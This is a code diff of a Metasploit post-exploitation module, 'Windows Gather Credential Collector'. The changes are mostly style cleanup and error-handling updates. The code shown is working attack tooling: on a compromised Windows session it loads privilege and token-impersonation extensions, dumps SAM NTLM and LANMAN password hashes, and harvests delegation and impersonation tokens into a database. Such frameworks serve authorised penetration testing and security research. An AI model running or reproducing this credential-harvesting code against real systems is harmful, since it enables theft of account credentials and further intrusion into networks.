@@ -11,11 +11,18 @@ class MetasploitModule < Msf::Post
       update_info(
         info,
         'Name' => 'Windows Gather Credential Collector',
-        'Description' => %q{ This module harvests credentials found on the host and stores them in the database.},
+        'Description' => %q{
+          This module harvests credentials found on the host and stores them in the database.
+        },
         'License' => MSF_LICENSE,
         'Author' => [ 'tebo[at]attackresearch.com'],
         'Platform' => [ 'win' ],
         'SessionTypes' => [ 'meterpreter'],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [],
+          'Reliability' => []
+        },
         'Compat' => {
           'Meterpreter' => {
             'Commands' => %w[
@@ -28,26 +35,19 @@ class MetasploitModule < Msf::Post
     )
   end
 
-  # Run Method for when run command is issued
   def run
-    print_status("Running module against #{sysinfo['Computer']}")
-    # Collect even without a database to store them.
-    if session.framework.db.active
-      db_ok = true
-    else
-      db_ok = false
-    end
+    hostname = sysinfo.nil? ? cmd_exec('hostname') : sysinfo['Computer']
+    print_status("Running module against #{hostname} (#{session.session_host})")
 
     # Make sure we're rockin Priv and Incognito
-    session.core.use("priv") if not session.priv
-    session.core.use("incognito") if not session.incognito
+    session.core.use('priv') if !session.priv
+    session.core.use('incognito') if !session.incognito
 
     # It wasn't me mom! Stinko did it!
     begin
       hashes = client.priv.sam_hashes
-    rescue
-      print_error('Error accessing hashes, did you migrate to a process that matched the target\'s architecture?')
-      return
+    rescue StandardError
+      fail_with(Failure::Unknown, "Error accessing hashes, did you migrate to a process that matched the target's architecture?")
     end
 
     # Target infos for the db record
@@ -55,7 +55,7 @@ class MetasploitModule < Msf::Post
     # client.framework.db.report_host(:host => addr, :state => Msf::HostState::Alive)
 
     # Record hashes to the running db instance
-    print_good "Collecting hashes..."
+    print_good('Collecting hashes...')
 
     hashes.each do |hash|
       # Build service information
@@ -63,16 +63,16 @@ class MetasploitModule < Msf::Post
         address: addr,
         port: 445,
         service_name: 'smb',
-        protocol: 'tcp',
+        protocol: 'tcp'
       }
 
       # Build credential information
       credential_data = {
         origin_type: :session,
         session_id: session_db_id,
-        post_reference_name: self.refname,
+        post_reference_name: refname,
         private_type: :ntlm_hash,
-        private_data: hash.lanman + ":" + hash.ntlm,
+        private_data: hash.lanman + ':' + hash.ntlm,
         username: hash.user_name,
         workspace_id: myworkspace_id
       }
@@ -95,11 +95,11 @@ class MetasploitModule < Msf::Post
 
     # Record user tokens
     tokens = session.incognito.incognito_list_tokens(0)
-    raise Rex::Script::Completed if not tokens
+    raise Rex::Script::Completed if !tokens
 
     # Meh, tokens come to us as a formatted string
-    print_good "Collecting tokens..."
-    (tokens["delegation"] + tokens["impersonation"]).split("\n").each do |token|
+    print_good 'Collecting tokens...'
+    (tokens['delegation'] + tokens['impersonation']).split("\n").each do |token|
       data = {}
       data[:host] = addr
       data[:type] = 'smb_token'
@@ -107,7 +107,8 @@ class MetasploitModule < Msf::Post
       data[:update] = :unique_data
 
       print_line "    #{data[:data]}"
-      report_note(data) if db_ok
+
+      report_note(data)
     end
   end
 end
